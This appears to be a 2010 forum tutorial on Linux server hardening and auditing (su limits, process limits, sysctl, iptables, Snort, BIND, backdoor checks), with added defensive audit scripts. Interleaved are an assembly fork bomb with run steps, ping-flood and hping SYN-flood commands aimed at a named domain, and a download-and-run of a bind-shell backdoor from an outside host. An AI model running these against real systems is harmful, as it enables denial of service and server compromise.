Linux Server Hardening and Auditing
Author: mywisdom
Date: Apr 22 2010

OK, back with me again, mywisdom. Now I'm gonna write a little article about Linux server hardening tricks. So here we go:

[b]Disable su for non-wheel group[/b]

To disable su for users outside the wheel group we need to edit the su file located in the /etc/pam.d directory:

[code]
nano /etc/pam.d/su
[/code]

then uncomment this line by deleting the # char:

[code]
auth required pam_wheel.so use_uid
[/code]

(the option is spelled use_uid; pam_wheel has no use_id option). If there is no line like that, just copy and paste that line into your su file in /etc/pam.d.

[b]Prevent Fork Bomb[/b]

A fork bomb is a very dangerous issue on Linux. If you have a box which doesn't limit the number of processes a user may create, once a user runs a fork bomb it will loop forever creating processes until your box crashes. To limit the maximum number of processes a single user can create on your box, you need to edit /etc/security/limits.conf:

[code]
nano /etc/security/limits.conf
[/code]

then you need to set nproc, the maximum number of processes a user can create. Here is a sample line to limit the max processes of any user within the wheel group:

[code]
@wheel hard nproc 10
[/code]

That line will limit all users in the wheel group to 10 processes. A sample for limiting the max processes of a single user (ex: username is mywisdom):

[code]
mywisdom hard nproc 10
[/code]

Here's a sample fork bomb for testing your box (filename: bomb.asm):

[code]
section .text
global _start
_start:
    push byte 2
    pop eax
    int 0x80
    jmp short _start
[/code]

compile and test:

[code]
nasm -f elf bomb.asm
ld -o bomb bomb.o
./bomb
[/code]

[b]Installing Bastille[/b]

Bastille is a very good utility to secure your box. OK, next let's install Bastille:

[code]
mywisdom@devilzc0der~#wget http://prdownloads.sourceforge.net/bastille-linux/Bastille-3.2.1-0.1.noarch.rpm?download
mywisdom@devilzc0der~#rpm -ivh --nodeps Bastille-3.2.1-0.1.noarch.rpm
Preparing...
########################################### [100%]
   1:Bastille               ########################################### [100%]
mywisdom@devilzc0der~#
[/code]

or you may install from the tarball source:

[code]
mywisdom@devilzc0der~#wget http://prdownloads.sourceforge.net/bastille-linux/Bastille-3.0.9.tar.bz2?download
mywisdom@devilzc0der~#tar -xjvf Bastille-3.0.9.tar.bz2
Bastille/
Bastille/bastille-tmpdir.csh
Bastille/VERSION
(... rest of the verbose tar file listing omitted ...)
mywisdom@devilzc0der~#umask 777
mywisdom@devilzc0der~#RPM_BUILD_ROOT=""
mywisdom@devilzc0der~#cd Bastille;./Install.sh
[/code]

Then run Bastille for the first time:

[code]
bastille -c
[/code]

[b]Disable ICMP echo request[/b]

As we already know, there are many DoS or DDoS attacks that send large ICMP packets to crash the server.
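The su restriction and the nproc limit above, and the sysctl -w changes used in this section and the next, are one-off edits that are easy to lose (a reinstalled package, a reboot). Here is an added audit script, not from the original post, that checks whether they are really in place; it runs against constructed sample files, and the file paths, user names and thresholds are assumptions.

```shell
#!/bin/sh
# Added audit helper, not from the original post. Each check reads a config
# file path, so it can be pointed at the real /etc files or at the constructed
# samples below. File names, user names and thresholds here are assumptions.

# Is pam_wheel enabled (uncommented, with use_uid) in a pam.d/su file?
# Prints "ok" or "missing".
pam_wheel_enabled() {   # usage: pam_wheel_enabled /etc/pam.d/su
    if grep -Eq '^[[:space:]]*auth[[:space:]]+(required|requisite)[[:space:]]+pam_wheel\.so[[:space:]]+.*use_uid' "$1"
    then echo ok; else echo missing; fi
}

# Effective hard nproc limit for a user from a limits.conf file, using the
# pam_limits precedence: an explicit user line beats an @group line, which
# beats the '*' default. Prints the value or "none".
# Caveat: limits.conf only applies to new login sessions, and only when
# pam_limits.so is in the PAM session stack.
nproc_hard_limit() {   # usage: nproc_hard_limit FILE USER "group1 group2 ..."
    awk -v user="$2" -v groups="$3" '
        BEGIN { n = split(groups, g, " "); for (i = 1; i <= n; i++) ingrp["@" g[i]] = 1 }
        /^[[:space:]]*#/ || NF < 4 { next }               # comments and blank lines
        ($2 == "hard" || $2 == "-") && $3 == "nproc" {
            p = 0
            if ($1 == user) p = 3
            else if ($1 in ingrp) p = 2
            else if ($1 == "*") p = 1
            if (p > 0 && p >= best) { best = p; val = $4 }
        }
        END { print (best ? val : "none") }' "$1"
}

# sysctl -w only changes the running kernel. Print each wanted key whose
# key=value is not set to exactly that value in a sysctl.conf file (it would
# be lost at the next reboot).
sysctl_missing() {   # usage: sysctl_missing /etc/sysctl.conf "key=val key=val"
    for want in $2; do
        key=${want%%=*}; val=${want#*=}
        key_re=$(printf '%s' "$key" | sed 's/\./\\./g')
        grep -Eq "^[[:space:]]*${key_re}[[:space:]]*=[[:space:]]*${val}[[:space:]]*$" "$1" || echo "$key"
    done
}

# --- constructed sample files (stand-ins for /etc/pam.d/su and friends) ---
TMPD=$(mktemp -d); trap 'rm -rf "$TMPD"' EXIT
cat >"$TMPD/su.default" <<'EOF'
#%PAM-1.0
auth    sufficient  pam_rootok.so
# Uncomment the following line to require a user to be in the "wheel" group.
#auth   required    pam_wheel.so use_uid
auth    include     system-auth
EOF
sed 's/^#auth/auth/' "$TMPD/su.default" >"$TMPD/su.hardened"
cat >"$TMPD/limits.conf" <<'EOF'
# <domain>  <type>  <item>  <value>
*           hard    nproc   200
@wheel      hard    nproc   10
mywisdom    hard    nproc   50
EOF
cat >"$TMPD/sysctl.conf" <<'EOF'
net.ipv4.ip_forward = 0
net.ipv4.tcp_syncookies = 1
EOF
WANT='net.ipv4.icmp_echo_ignore_all=1 net.ipv4.tcp_syncookies=1'

# Demo run against the samples.
echo "pam_wheel (default):  $(pam_wheel_enabled "$TMPD/su.default")"
echo "pam_wheel (hardened): $(pam_wheel_enabled "$TMPD/su.hardened")"
echo "nproc for mywisdom:   $(nproc_hard_limit "$TMPD/limits.conf" mywisdom 'wheel users')"
echo "nproc for alice:      $(nproc_hard_limit "$TMPD/limits.conf" alice users)"
echo "not persisted:        $(sysctl_missing "$TMPD/sysctl.conf" "$WANT")"
```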
So now we are going to disable ICMP echo requests. Here we go:

[code]
mywisdom@devilzc0der~#sysctl -w net.ipv4.icmp_echo_ignore_all=1
net.ipv4.icmp_echo_ignore_all = 1
mywisdom@devilzc0der~#ping localhost
PING localhost (127.0.0.1) 56(84) bytes of data.
[/code]

See??? No more ICMP reply !!! gotcha !!! ;-p (sysctl -w only changes the running kernel; put the same line in /etc/sysctl.conf to keep it after a reboot.)

Contra: here is an example of how a simple ICMP attack is done:

[code]
ping -fs 50000 www.tbd.my
[/code]

[b]Blocking SYN Attack on your Box[/b]

Many DDoSers (including me, I used to DDoS ;-p) use SYN attacks nowadays, so we need to block them ;-p. Here we go:

[code]
mywisdom@kernel-patcher#sysctl -w net.ipv4.tcp_syncookies=1
net.ipv4.tcp_syncookies = 1
mywisdom@kernel-patcher#echo "Done already :-p"
[/code]

Here's a sample SYN attack using hping:

[code]
hping -i u1 -S -p 80 www.tbd.my
[/code]

Use at your own risk.

[b]Kernel Patching[/b]

Kernel patching is important to keep your box from being rooted:

[code]
mywisdom@kernel-patcher#cd /usr/src/linux
mywisdom@kernel-patcher#uname -a
Linux xxxxxx 2.6.21.5 #2 SMP Thu Apr 10 04:23:56 GMT 2008 i686 Intel(R) Core(TM)2 Duo CPU T5670 @ 1.80GHz GenuineIntel GNU/Linux
mywisdom@kernel-patcher#wget http://www.kernel.org/pub/linux/kernel/v2.6/patch-2.6.21.5.gz
--06:22:29--  http://www.kernel.org/pub/linux/kernel/v2.6/patch-2.6.21.5.gz
           => `patch-2.6.21.5.gz'
Resolving www.kernel.org... 199.6.1.164, 204.152.191.37, 130.239.17.4, ...
Connecting to www.kernel.org|199.6.1.164|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 48,881 (48K) [application/x-gzip]

100%[====================================>] 48,881        30.60K/s

06:22:34 (30.57 KB/s) - `patch-2.6.21.5.gz' saved [48881/48881]

mywisdom@kernel-patcher#gunzip patch-2.6.21.5.gz
mywisdom@kernel-patcher#patch -p1 < patch-2.6.21.5
[/code]

[b]Change Default SSH Port[/b]

The default SSH port is always 22, so let's change it. As an example I change the SSH port to port 31337:

[code]
mywisdom@31337~#nano /etc/ssh/sshd_config
[/code]

then find this line:

[code]
Port 22
[/code]

and change it to:

[code]
Port 31337
[/code]

then restart your SSH daemon:

[code]
/etc/init.d/sshd restart
[/code]

[b]How to detect malicious backdoors / daemons / processes using netstat, chkconfig and ps[/b]

OK, for a real-life test, let's install a malicious bind-port shell (for testing only):

[code]
mywisdom@31337~#wget http://yoyoparty.com/upload/bdp
--2010-04-22 01:57:25--  http://yoyoparty.com/upload/bdp
Slår upp yoyoparty.com... 211.189.69.116
Ansluter till yoyoparty.com|211.189.69.116|:80... ansluten.
HTTP-begäran skickad, väntar på svar... 200 OK
Längd: 594 [text/plain]
Sparar till "bdp".

100%[======================================>] 594         --.-K/s   på 0s

2010-04-22 01:57:26 (76,3 MB/s) - "bdp" sparad [594/594]

mywisdom@31337~#chmod +x bdp
mywisdom@31337~#./bdp 3338 &
[2] 12093
mywisdom@31337~#Statement unlikely to be reached at ./bdp line 21.
        (Maybe you meant system() when you said exec()?)
mywisdom@31337~#
[/code]

OK, as we see it's backdooring port 3338. Now let's check it using the ps command:

[code]
mywisdom@31337~#ps aux
[/code]

Then, if you look closely, you will see this malicious process:

[code]
root     12093  0.0  0.0   7048  2220 pts/1    S    01:58   0:00 /usr/bin/perl -w ./bdp 3338
[/code]

To kill this malicious process just do this (12093 is only a sample PID, it's different on every machine):

[code]
kill 12093
[/code]

Otherwise you may use netstat to check for malicious backdoors:

[code]
mywisdom@31337~#netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:tcpmux                *:*                     LISTEN
tcp        0      0 *:licensedaemon         *:*                     LISTEN
tcp        0      0 *:infowave              *:*                     LISTEN
tcp        0      0 *:13123                 *:*                     LISTEN
tcp        0      0 *:radsec                *:*                     LISTEN
tcp        0      0 *:gnunet                *:*                     LISTEN
tcp        0      0 *:eli                   *:*                     LISTEN
tcp        0      0 *:consul-insight        *:*                     LISTEN
tcp        0      0 *:anet-b                *:*                     LISTEN
tcp        0      0 *:mysql                 *:*                     LISTEN
tcp        0      0 localhost:783           *:*                     LISTEN
tcp        0      0 *:nbx-ser               *:*                     LISTEN
tcp        0      0 *:sunrpc                *:*                     LISTEN
tcp        0      0 *:nbx-dir               *:*                     LISTEN
tcp        0      0 *:http                  *:*                     LISTEN
tcp        0      0 *:smtps                 *:*                     LISTEN
tcp        0      0 *:ftp                   *:*                     LISTEN
[/code]

We see there's a suspected backdoor at port 13123. Let's check it using netcat:

[code]
mywisdom@31337~#nc localhost 13123
bash: no job control in this shell
[/code]

Shitz!!! It's a bind-port backdoor, dude, so you may use iptables to close that port (the rule only hides the listener from the network; still kill the process and remove the file):

[code]
mywisdom@devilzc0der~#iptables -A INPUT -p TCP --dport 13123 -j REJECT
mywisdom@devilzc0der~#nc localhost 13123
localhost [127.0.0.1] 13123 (?) : Connection refused
mywisdom@devilzc0der~#
[/code]

Another sample: you may use chkconfig to check for malicious daemons, looking for service names you did not install (this box runs a Swedish locale, so "på" means on and "av" means off):

[code]
mywisdom@31337~#chkconfig --list
NetworkManager            0:av 1:av 2:av 3:av 4:av 5:av 6:av
NetworkManagerDispatcher  0:av 1:av 2:av 3:av 4:av 5:av 6:av
acpid                     0:av 1:av 2:av 3:på 4:på 5:på 6:av
anacron                   0:av 1:av 2:av 3:av 4:av 5:av 6:av
auditd                    0:av 1:av 2:på 3:på 4:på 5:på 6:av
autofs                    0:av 1:av 2:av 3:på 4:på 5:på 6:av
avahi-daemon              0:av 1:av 2:av 3:av 4:av 5:av 6:av
avahi-dnsconfd            0:av 1:av 2:av 3:av 4:av 5:av 6:av
bandmin                   0:av 1:av 2:på 3:på 4:på 5:på 6:av
bluetooth                 0:av 1:av 2:av 3:av 4:av 5:av 6:av
conman                    0:av 1:av 2:av 3:av 4:av 5:av 6:av
courier-authlib           0:av 1:av 2:på 3:på 4:på 5:på 6:av
courier-imap              0:av 1:av 2:på 3:på 4:på 5:på 6:av
cpanel                    0:av 1:av 2:av 3:på 4:på 5:på 6:av
cpuspeed                  0:av 1:på 2:på 3:på 4:på 5:på 6:av
crond                     0:av 1:av 2:på 3:på 4:på 5:på 6:av
csf                       0:av 1:av 2:på 3:på 4:på 5:på 6:av
cups                      0:av 1:av 2:på 3:på 4:på 5:på 6:av
dc_client                 0:av 1:av 2:av 3:av 4:av 5:av 6:av
dc_server                 0:av 1:av 2:av 3:av 4:av 5:av 6:av
dhcdbd                    0:av 1:av 2:av 3:av 4:av 5:av 6:av
dovecot                   0:av 1:av 2:av 3:av 4:av 5:av 6:av
dund                      0:av 1:av 2:av 3:av 4:av 5:av 6:av
exim                      0:av 1:av 2:på 3:på 4:på 5:på 6:av
fastmail                  0:av 1:av 2:på 3:på 4:på 5:på 6:av
filelimits                0:av 1:av 2:på 3:på 4:på 5:på 6:av
firstboot                 0:av 1:av 2:av 3:på 4:av 5:på 6:av
haldaemon                 0:av 1:av 2:av 3:på 4:på 5:på 6:av
hidd                      0:av 1:av 2:av 3:av 4:av 5:av 6:av
httpd                     0:av 1:av 2:av 3:på 4:av 5:på 6:av
ibmasm                    0:av 1:av 2:av 3:av 4:av 5:av 6:av
ip6tables                 0:av 1:av 2:på 3:på 4:på 5:på 6:av
ipaliases                 0:av 1:av 2:på 3:på 4:på 5:på 6:av
ipmi                      0:av 1:av 2:av 3:av 4:av 5:av 6:av
iptables                  0:av 1:av 2:på 3:på 4:på 5:på 6:av
irda                      0:av 1:av 2:av 3:av 4:av 5:av 6:av
irqbalance                0:av 1:av 2:på 3:på 4:på 5:på 6:av
kdump                     0:av 1:av 2:av 3:av 4:av 5:av 6:av
kudzu                     0:av 1:av 2:av 3:på 4:på 5:på 6:av
lfd                       0:av 1:av 2:på 3:på 4:på 5:på 6:av
lvm2-monitor              0:av 1:på 2:på 3:på 4:på 5:på 6:av
mcstrans                  0:av 1:av 2:på 3:på 4:på 5:på 6:av
mdmonitor                 0:av 1:av 2:på 3:på 4:på 5:på 6:av
mdmpd                     0:av 1:av 2:av 3:av 4:av 5:av 6:av
messagebus                0:av 1:av 2:av 3:på 4:på 5:på 6:av
microcode_ctl             0:av 1:av 2:på 3:på 4:på 5:på 6:av
multipathd                0:av 1:av 2:av 3:av 4:av 5:av 6:av
mysql                     0:av 1:av 2:på 3:på 4:på 5:på 6:av
named                     0:av 1:av 2:av 3:på 4:på 5:på 6:av
netconsole                0:av 1:av 2:av 3:av 4:av 5:av 6:av
netfs                     0:av 1:av 2:av 3:på 4:på 5:på 6:av
netplugd                  0:av 1:av 2:av 3:av 4:av 5:av 6:av
network                   0:av 1:av 2:på 3:på 4:på 5:på 6:av
nfs                       0:av 1:av 2:av 3:av 4:av 5:av 6:av
nfslock                   0:av 1:av 2:av 3:på 4:på 5:på 6:av
nscd                      0:av 1:av 2:av 3:av 4:av 5:av 6:av
ntpd                      0:av 1:av 2:av 3:av 4:av 5:av 6:av
oddjobd                   0:av 1:av 2:av 3:av 4:av 5:av 6:av
pand                      0:av 1:av 2:av 3:av 4:av 5:av 6:av
pcscd                     0:av 1:av 2:av 3:av 4:av 5:av 6:av
portsentry                0:av 1:av 2:av 3:på 4:på 5:på 6:av
psacct                    0:av 1:av 2:av 3:av 4:av 5:av 6:av
pure-ftpd                 0:av 1:av 2:av 3:på 4:av 5:på 6:av
rdisc                     0:av 1:av 2:av 3:av 4:av 5:av 6:av
readahead_early           0:av 1:av 2:på 3:på 4:på 5:på 6:av
readahead_later           0:av 1:av 2:av 3:av 4:av 5:på 6:av
restorecond               0:av 1:av 2:på 3:på 4:på 5:på 6:av
ror                       0:av 1:av 2:på 3:på 4:på 5:på 6:av
rpcgssd                   0:av 1:av 2:av 3:på 4:på 5:på 6:av
rpcidmapd                 0:av 1:av 2:av 3:på 4:på 5:på 6:av
rpcsvcgssd                0:av 1:av 2:av 3:av 4:av 5:av 6:av
rwhod                     0:av 1:av 2:av 3:av 4:av 5:av 6:av
saslauthd                 0:av 1:av 2:av 3:av 4:av 5:av 6:av
securetmp                 0:av 1:av 2:på 3:på 4:på 5:på 6:av
setroubleshoot            0:av 1:av 2:av 3:på 4:på 5:på 6:av
smartd                    0:av 1:av 2:på 3:på 4:på 5:på 6:av
smb                       0:av 1:av 2:av 3:av 4:av 5:av 6:av
spamassassin              0:av 1:av 2:av 3:av 4:av 5:av 6:av
squid                     0:av 1:av 2:av 3:av 4:av 5:av 6:av
sshd                      0:av 1:av 2:på 3:på 4:på 5:på 6:av
syslog                    0:av 1:av 2:på 3:på 4:på 5:på 6:av
sysstat                   0:av 1:av 2:på 3:på 4:av 5:på 6:av
tux                       0:av 1:av 2:av 3:av 4:av 5:av 6:av
vsftpd                    0:av 1:av 2:av 3:av 4:av 5:av 6:av
winbind                   0:av 1:av 2:av 3:av 4:av 5:av 6:av
wpa_supplicant            0:av 1:av 2:av 3:av 4:av 5:av 6:av
xinetd                    0:av 1:av 2:av 3:på 4:på 5:på 6:av
yum-updatesd              0:av 1:av 2:av 3:på 4:på 5:på 6:av
[/code]

[b]Installing Snort and running Snort as an Intrusion Detection System[/b]

Snort is a very popular IDS (Intrusion Detection System) on Linux. OK, first let's install Snort:

[code]
mywisdom@31337~#rpm -ivh snort-2.8.5.3-1.src.rpm
   1:snort                  ########################################### [100%]
mywisdom@31337~#
[/code]

Snort has 3 modes:

1. sniffer mode
2. packet logger mode
3. network IDS mode

Here's a sample of using Snort as a packet dumper (sniffer mode):

[code]
mywisdom@devilzc0der~#snort -v
Running in packet dump mode

        --== Initializing Snort ==--
Initializing Output Plugins!
Verifying Preprocessor Configurations!
***
*** interface device lookup found: eth0
***
Initializing Network Interface eth0
Decoding Ethernet on interface eth0

        --== Initialization Complete ==--

   ,,_     -*> Snort! <*-

04/22-07:41:38.198492 192.168.153.132:32788 -> 213.136.42.130:22
TCP TTL:64 TOS:0x10 ID:32321 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xDA3F1274  Ack: 0x3212E0DD  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[/code]

Here's our Snort analysis of that packet:

[code]
04/22-07:41:38.198492 192.168.153.132:32788 -> 213.136.42.130:22
TCP TTL:64 TOS:0x10 ID:32321 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xDA3F1274  Ack: 0x3212E0DD  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[/code]

- 04/22-07:41:38.198492 -> the timestamp, clear OK??
- 192.168.153.132:32788 -> source IP 192.168.153.132, port 32788
- 213.136.42.130:22 -> destination IP and port
- TCP TTL:64 TOS:0x10 ID:32321 IpLen:20 DgmLen:40 DF -> protocol is TCP, time to live, type of service, packet identification, IP header length, datagram length, don't-fragment flag

Here's a sample of running Snort in packet logger mode:

[code]
mywisdom@devilzc0der~#snort -dev -l /var/log/snort
Running in packet logging mode
Log directory = /var/log/snort

        --== Initializing Snort ==--
Initializing Output Plugins!
Verifying Preprocessor Configurations!
***
*** interface device lookup found: eth0
***
Initializing Network Interface eth0
Decoding Ethernet on interface eth0

        --== Initialization Complete ==--

   ,,_     -*> Snort! <*-

0:C:29:E3:78:4D -> 0:50:56:FD:57:13 type:0x800 len:0x36
192.168.153.132:32788 -> 213.136.42.130:22 TCP TTL:64 TOS:0x10 ID:32335 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xDA3F13C4  Ack: 0x3212E31D  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/22-08:25:29.650784 0:50:56:FD:57:13 -> 0:C:29:E3:78:4D type:0x800 len:0x76
213.136.42.130:22 -> 192.168.153.132:32788 TCP TTL:128 TOS:0x0 ID:57468 IpLen:20 DgmLen:104
***AP*** Seq: 0x3212E31D  Ack: 0xDA3F13C4  Win: 0xFAF0  TcpLen: 20
66 64 76 8B 16 D5 66 F4 5C D2 A1 04 6D 05 2A C2  fdv...f.\...m.*.
7D DC D4 24 72 0D 84 D3 D7 56 A6 1D 89 36 6D 59  }..$r....V...6mY
CF 61 C2 E8 61 D9 02 FB 64 0D C5 35 96 B3 15 DD  .a..a...d..5....
2C FB 3D 8A CA C3 68 E2 02 E4 A2 08 36 C2 3D D8  ,.=...h.....6.=.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/22-08:25:29.650826 0:C:29:E3:78:4D -> 0:50:56:FD:57:13 type:0x800 len:0x36
192.168.153.132:32788 -> 213.136.42.130:22 TCP TTL:64 TOS:0x10 ID:32336 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xDA3F13C4  Ack: 0x3212E35D  Win: 0xFFFF  TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[/code]

Let's check our Snort log:

[code]
mywisdom@devilzc0der~#cd /var/log/snort
mywisdom@devilzc0der~#ls
alert  archive  snort.log.1271924381  snort.log.1271924704
mywisdom@devilzc0der~#more snort.log.1271924381
[/code]

[b]Open only needed ports: playing with iptables[/b]

Let's scan our box using nmap:

[code]
mywisdom@31337~#nmap localhost

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2010-04-22 03:41 CEST
Interesting ports on localhost (127.0.0.1):
Not shown: 1661 closed ports
PORT      STATE SERVICE
1/tcp     open  tcpmux
21/tcp    open  ftp
80/tcp    open  http
93/tcp    open  imaps
31337/tcp open  ssh
3306/tcp  open  mysql

Nmap finished: 1 IP address (1 host up) scanned in 0.107 seconds
mywisdom@31337~#
[/code]

As for me, a good server only needs 2 open ports, so the others need to be closed. Here we may use iptables to do that job:

[code]
mywisdom@devilzc0der~#iptables -A INPUT -p TCP --dport 1 -j REJECT
mywisdom@devilzc0der~#iptables -A INPUT -p TCP --dport 21 -j REJECT
mywisdom@devilzc0der~#iptables -A INPUT -p TCP --dport 93 -j REJECT
mywisdom@devilzc0der~#iptables -A INPUT -p TCP --dport 3306 -j REJECT
[/code]

So only 2 open ports are left: port 80 and port 31337 (our SSH port that we set above).

[b]Protection From DNS Cache Poisoning[/b]

Here's a simple technique to prevent DNS cache poisoning on our server. Here we go, white hats !!! Preventing recursive requests:

[code]
mywisdom@devilzc0der~#nano /etc/named.conf
[/code]

Then add this to the options block of your /etc/named.conf:

[code]
options {
    recursion no;
};
[/code]

Then we may use a fake BIND version to trick the attacker (the hacker) ;-p. Find the line with the version info and replace it with this (only a sample; it goes inside the same options block):

[code]
version "Bind Anti Hacker";
[/code]

;-p

[b]Manual checking for possible malicious attackers on your system[/b]

I suggest you check often for possible malicious attackers. First let's check out the /tmp directory, as it's a world-writable directory where a reckless attacker always puts their backdoors and sploits:

[code]
mywisdom@31337~#cd /tmp;ls -la
totalt 3499
drwxrwxrwt 20 root     root     191488 22 apr 04.09 .
drwxr-xr-x 24 root     root       4096 18 apr 04.02 ..
drwxr-xr-x  2 racimax  racimax    1024  8 apr 06.50 ?
drwxrwx--x  2 kyrksido kyrksido   1024 21 apr 05.03 04
-rw-------  1 rifixse  rifixse   54038  3 sep  2009 08LFuYwxY7.zip
-rw-r--r--  1 racimax  racimax   12107 20 apr 10.26 1.php
-rw-r--r--  1 racimax  racimax     612 19 apr 23.33 818811119.txt
-rwxr--r--  1 root     root       6144  9 mar 10.54 aquota.user
-rw-r--r--  1 racimax  racimax   28385  9 apr 21.56 ave.txt
-rw-r--r--  1 racimax  racimax     541 18 apr 19.42 back
-rwxr-xr-x  1 racimax  racimax    6241 18 apr 19.43 backc
-rwxr-xr-x  1 racimax  racimax    5748 17 apr 22.23 bc
-rw-r--r--  1 racimax  racimax     438 17 apr 22.23 bc.pl
-rwxr-xr-x  1 root     mysql       594 25 feb 19.54 bdp
-rw-------  1 rifixse  rifixse   54038  3 sep  2009 bHIwOlANJm.zip
-rwxr-xr-x  1 racimax  racimax    6290 17 apr 22.23 bp
drwxr-xr-x  2 root     root       1024  9 maj  2008 cpbandwidth
drwxrwx--x  2 kyrksido kyrksido   1024 21 apr 05.03 d0
drwxrwx--x  2 kyrksido kyrksido   1024 21 apr 05.03 e8
drwxrwx--x  2 kyrksido kyrksido   1024 21 apr 05.03 f1
drwxrwxrwt  2 root     root       1024  7 apr  2008 .font-unix
-rw-r--r--  1 racimax  racimax    5592  8 okt  2009 fs7100
-rw-------  1 cpanel   cpanel        0 15 dec 05.17 .ftpquota
drwxrwxrwt  2 root     root       1024 14 dec 09.32 .ICE-unix
drwxr-xr-x  2 racimax  racimax    1024 29 mar 03.44 .log
drwx------  2 root     root      12288  7 apr  2008 lost+found
lrwxrwxrwx  1 root     root         30 22 apr 04.04 mysql.sock -> ../../var/lib/mysql/mysql.sock
-rw-------  1 racimax  racimax   53788 25 feb  2009 oTrnweIWGD.zip
-rw-------  1 racimax  racimax   78096 15 apr 21.43 page.txt
drwxr-xr-x  3 root     root       1024  7 apr  2008 pear
drwxr-xr-x  7 racimax  racimax    1024 20 apr 19.40 .psy
-rwxr--r--  1 root     root         32  9 mar 10.54 quota.user
drwx------  2 root     root       1024  7 apr  2008 rcs05X3oJ
drwx------  2 root     root       1024  7 apr  2008 rcs35WSLk
drwx------  2 root     root       1024  7 apr  2008 rcsCnsRxQ
drwx------  2 root     root       1024  7 apr  2008 rcsfU906O
drwx------  2 root     root       1024  7 apr  2008 rcsU31Mf2
-rw-------  1 root     root       1024  7 apr  2008 .rnd
-rw-------  1 partysho partysho  10655 18 feb 07.34 sess_01ab3541de73e2f46888c7e175a47796
(... hundreds of PHP session files sess_* follow, omitted ...)
[/code]
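The netstat, nmap/iptables and /tmp checks above are all done by eye in the post. Here is an added script, not the author's, that makes them repeatable: it flags listeners outside an allowlist, emits a default-deny rule set instead of rejecting ports one at a time, and lists executables in a world-writable directory (in the listing above it would pick out bdp, backc, bc and bp). The netstat lines, the sample directory contents and the allowlist of 80 and 31337 are constructed assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: the netstat / nmap / iptables
# steps as repeatable checks. The netstat sample, the /tmp sample and the
# allowlist (80 and the post's SSH port 31337) are constructed assumptions.

# Print LISTEN ports (tcp and tcp6) that are not in the allowlist, one per
# line, numerically sorted. Feed it numeric output (netstat -tln, or -tlnp to
# see owning PIDs): service names like "tcpmux" in plain netstat -a only hide
# the port number.
unexpected_listeners() {   # usage: netstat -tln | unexpected_listeners "80 31337"
    awk -v allow="$1" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        $1 ~ /^tcp/ && $6 == "LISTEN" {
            port = $4; sub(/.*:/, "", port)          # 0.0.0.0:13123 or :::80 -> 13123 / 80
            if (!(port in ok) && !seen[port]++) print port
        }' | LC_ALL=C sort -n
}

# Emit a default-deny INPUT policy that allows only loopback, replies to our
# own connections and the allowlisted TCP ports. Printed rather than executed,
# so it can be reviewed before being piped to sh as root. -A rules are gone
# after a reboot unless saved with the distro's iptables save mechanism.
allowlist_rules() {   # usage: allowlist_rules "80 31337"
    echo 'iptables -F INPUT'
    echo 'iptables -A INPUT -i lo -j ACCEPT'
    echo 'iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT'
    for p in $1; do
        echo "iptables -A INPUT -p tcp --dport $p -j ACCEPT"
    done
    echo 'iptables -P INPUT DROP'   # policy last, so SSH stays reachable while the rules load
}

# List executable regular files under a world-writable directory such as /tmp,
# relative to it, hidden directories included. Legitimate software rarely
# needs executables there.
tmp_executables() {   # usage: tmp_executables /tmp
    find "$1" -type f \( -perm -100 -o -perm -010 -o -perm -001 \) |
        sed "s|^$1/||" | LC_ALL=C sort
}

# --- constructed samples ---
NETSTAT_SAMPLE=$(cat <<'EOF'
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:1               0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:13123           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:31337           0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN
tcp6       0      0 :::13123                :::*                    LISTEN
EOF
)
SAMPLE_TMP=$(mktemp -d); trap 'rm -rf "$SAMPLE_TMP"' EXIT
mkdir "$SAMPLE_TMP/.psy"
: >"$SAMPLE_TMP/1.php"; : >"$SAMPLE_TMP/sess_01ab3541"    # data files, not executable
: >"$SAMPLE_TMP/bdp"; chmod 755 "$SAMPLE_TMP/bdp"          # stand-in for the post's bind shell
: >"$SAMPLE_TMP/.psy/shell"; chmod 700 "$SAMPLE_TMP/.psy/shell"

echo "unexpected listeners:"; printf '%s\n' "$NETSTAT_SAMPLE" | unexpected_listeners "80 31337"
echo "firewall rules:";       allowlist_rules "80 31337"
echo "executables in tmp:";   tmp_executables "$SAMPLE_TMP"
```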
